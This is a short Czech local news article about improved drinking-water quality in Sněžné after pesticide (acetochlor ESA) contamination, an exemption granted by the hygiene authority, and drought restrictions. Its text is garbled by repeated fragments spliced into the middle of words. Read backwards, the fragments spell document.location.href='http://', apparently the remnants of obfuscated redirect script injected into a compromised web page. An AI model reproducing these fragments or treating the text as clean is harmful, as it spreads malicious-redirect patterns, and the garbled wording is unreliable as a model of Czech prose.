Rainbow page separator

Kvalita pitné vody ve Sněžném je podle výsledků odběrů lepší

Neděle, 8. září 2019

Sněžné / Kvalita pitné vody, kterou odebírají obyvatelé Sněžného, se podle posledního rozboru zlepšila. Konkrétně se [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to týká výrazného poklesu hladiny ace[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochloru ESA, dříve zvýšené. Další kontrolní odběr se v městysi uskuteční v průběhu září.
Ve Sněžném se objevily vyšší hodnoty pesticidů, konkrétně ace[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochloru ESA, před několika lety, přičemž voda byla kontaminovaná postřiky, které se aplikovaly při zemědělské činnosti. Nejprve byly znečištěny průzkumné vrty, jež obec nechala vyhloubit v rámci posílení zdrojů vody, poté bylo zjištěno, že i z vodovodních kohoutků teče voda s překročenými hodnotami. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě může hygienická stanice přechodně schválit vyšší limit, pročež městys hygieniky požádal o výjimku, aby nemusel vodovod zcela odstavit. Dostal ji na tři roky s tím, že hodnoty je nutné snížit, což se nyní podařilo.
Problémy s pitnou vodou měli ve Sněžném rovněž v souvislosti s dlouhotrvajícím suchem, takže hasiči do místního vodojemu v případě potřeby naváželi vodu, aby doplnili jeho nedostatečný stav. V městysi byl v letních měsících taktéž vyhlášen zákaz plýtvání vody z vodovodní sítě, například k napouštění bazénů, mytí aut a podobným činnostem.